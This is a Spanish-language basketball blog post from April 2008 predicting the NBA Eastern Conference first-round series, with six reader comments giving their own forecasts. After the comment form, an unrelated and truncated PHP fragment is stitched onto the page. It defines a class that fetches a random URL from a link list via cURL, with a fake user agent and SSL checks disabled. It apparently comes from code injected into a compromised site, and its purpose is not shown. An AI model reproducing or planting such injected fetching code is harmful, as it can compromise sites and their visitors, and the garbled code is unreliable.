Los Playoffs 2008: Eastern Conference

17 de April de 2008 por TheDeerHunter

La lucha por entrar en Playoffs en el este ha sido mucho menos apasionante. Sin duda la batalla del Salvaje Oeste ha eclipsado lo ocurrido en la conferencia pobre de la NBA que, sin embargo, acoge a los 2 equipos con mejor récord de la temporada. Hoy es el día indicado para comprobar nuestros aciertos y nuestros errores a la hora de profetizar la carrera del este en busca del anillo.

Éste fue el pronóstico

Pese a los últimos intentos de Indiana, los 8 equipos clasificados estaban prácticamente decididos en las últimas semanas, quizá desde el momento en el que Jason Kidd viajó desde New Jersey hasta Dallas. Tampoco ayudó a darle emoción el que todo estuviera hecho con respecto a ciertas posiciones. Boston primeros, Detroit segundos e incluso Orlando terceros… así ha sido prácticamente desde el mes de enero y en ningún momento han corrido peligro ninguna de estas 3 posiciones. Sin duda, los 3 equipos han tenido trayectorias dignas de elogio (unos mucho más que otros), pero quizá tanto dominio le ha quitado algo de lustre a la parte final de la temporada en el Este.

El pronóstico de hace 3 semanas falló únicamente en pensar que un calendario cómodo bastaba para que los Raptors llegaran al 5º puesto. Era difícil acertar, porque no contabamos el terrible juego desplegado con TJ “Speedy Gonzalez” Ford como titular “dirigiendo” (más bien digiriendo) al equipo. Más todavía si la única opción de seguir vivos, en opinión de los propios jugadores, era cazar el cruce contra Orlando. Habrá que ver si en el pecado no llevan la penitencia.

Como consecuencia del bajón final de los Raptors, este año viviremos por tercera temporada consecutiva un Cavs-Wizards en primera ronda, un enfrentamiento que ya se ha convertido en todo un clásico y en algo personal entre LeBron y Arenas. Philadelphia certifica una temporada por encima de las expectativas con su séptimo puesto, mientras que los Hawks dan un pasito más en su eterna reconstrucción retrasando sus vacaciones 2 semanitas más.

Así las cosas, es difícil imaginar sorpresas en esta primera ronda, con unas eliminatorias relativamente desequilibradas.

1. Celtics vs 8. Hawks: 3-0 a favor de Boston. La imagen de los Celtics esta temporada es inmaculada, tanto en defensa como en ataque. Ningún pero. El trabajo hecho por Danny Ainge ha dado sus frutos y los Garnett, Pierce, Allen y compañía han sido lo más parecido a una apisonadora esta temporada. 66 victorias lo demuestran. Los Hawks afrontan esta fase final con mucha ilusión y con ganas de coger experiencia. Por historia, por plantilla, por juego, por intensidad, ganas, experiencia… por todo, ganará Boston 4-0.

2. Pistons vs 7. Sixers: El temporadón de los sixers (2-2 esta temporada contra los Pistons), probablemente no será suficiente. Ellos ya han cumplido y esa podría ser su baza (¿¿¿viajará el we believe de Golden State a la ciudad del amor fraternal???). A pesar de todo, ahora empieza la temporada para Detroit. Nadie piensa que pueda haber sorpresas. 4-1 a favor de Pistons.

3. Orlando vs 6. Toronto: Orlando gana 2-1. Ambos equipos llegan al momento de la verdad con una ligera tendencia descendente. Hay quien dice que a Dwigth Howard se le están acabando las pilas pero Toronto es un equipo devorado por un concepto completamente contrario a lo que debería ser. Orlando sí sabe a lo que juega y tiene buenos jugadores además de Howard. Mientras, Toronto ha llegado a un punto en que no tiene claro nada. Será difícil que haya sorpresa. 4-0 a favor de Orlando.

4. Cleveland vs 5. Wizards: 2 triunfos para cada equipo. Habiendo recuperado jugadores clave al final de temporada (Butler y sobre todo Arenas), no se podría considerar un sorpresón que Washington eliminara a LeBron y sus Lebrones. Sin embargo, la sombra de James es alargada y sus nuevos (y no tan nuevos) compañeros no son mancos (a pesar de que algún día se hayan empeñado en demostrar lo contrario). Por el estilo de juego de unos u otros el factor cancha puede no ser decisivo pero se adivina una eliminatoria igualada con ligero favoritismo para LeBron. 4-3 para Cleveland.

Comenta

6 comentarios a esta entrada

  1. Gallis dice:
    #1

    Como en el oeste, una a una…

    Boston- Hawks: nada que hacer. Los Hawks deben aprender todo lo que puedan sobre lo que es jugar un partido de Playoff. Ganar un partido en Atlanta podría ser una fiesta, pero dudo que ocurra. 4-0 para Boston.

    Pistons- Sixers: Como dice Deer, ahora es cuando empieza la temporada para Billups, Sheed y compañia, pero los Sixers llegan embalados. No veo posibilidad de sorpresa, pero darán guerra. 4-2 para los Pistons.

    Orlando-Toronto: en estas tengo serias dudas. Orlando nunca me ha parecido un equipo fiable, pero ahora Toronto me lo parece aún menos. Si Lewis crece, Orlando pasará fácil. Si TJ se lesiona, jejejeje, los Raptors tendrán más opciones. Venga va, 2-4 para los Raptors.

    Cavs-Wizards: Esta vez es personal. Arenas está harto de perder con Lebron, pero está por ver como llega. Además, Bron querrá demostrarle a Stevenson lo sobrevalorado que está. A priori, la eliminatoria más igualada. Me gustaría que pasaran los Wizards, pero apuesto por clevelnad 4-3.

      Citar

  2. txusma dice:
    #2

    Creo q Toronto dara algo de guerra aunq como Dwight se haya estado medio reservando en estos ultimos partidos poco tienen para contrarrestar su poderio interior. Toronto posee una profundidad de plantilla mucho mayor y a lo mejor hay esta la clave. Los Kapono, Calderon, Delfino, Brezec… pueden jugar un importante papel…

      Citar

  3. MagicJohnson32 dice:
    #3

    ¡¡Veo a Wizards, Raptors y Sixers en semis del Este!! ¿Será que es viernes? Aunque dudo que haya barridas, incluso creo que los Hawks sacarán uno.

    Ojo al Pistons-Sixers.

      Citar

  4. Jabho dice:
    #4

    Vega tb uno a uno en mi Este:

    Boston-Atlanta: Paseo para Boston. Atlanta puede irse como el único equipo en no ganar un partido de PO
    Detroit – Sixers: Pasa Detroit pero los SIxers estan en buena onda y seguro que daran alguna alegria. De todas formas han llegado hasta aqui. Con pasta fresca este verano el año que viene puede ser otra cosa.
    Orlando-Raptors: Orlando a la calle. Creo que los Raptors tienen mas recursos y aunque no llegan bien ya se fueron demasiado pronto a casa el año pasado. Espero que pasen y eso pasa por dar mucho protagonismo a Calde.
    Cleveland-Wizards: En una eliminatoria igualada Lebron marca la diferencia. Cavaliers.

      Citar

  5. Jabho dice:
    #5

    Por cierto, para mi Cleveland es el “tapado” del Este (si puede ser tapado el finalista del año pasado)

      Citar

  6. TheDeerHunter dice:
    #6

    Desde luego no se aprecia que puedan repetir el milagro…

    Son capaces de ello, pero yo particularmente no lo creo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>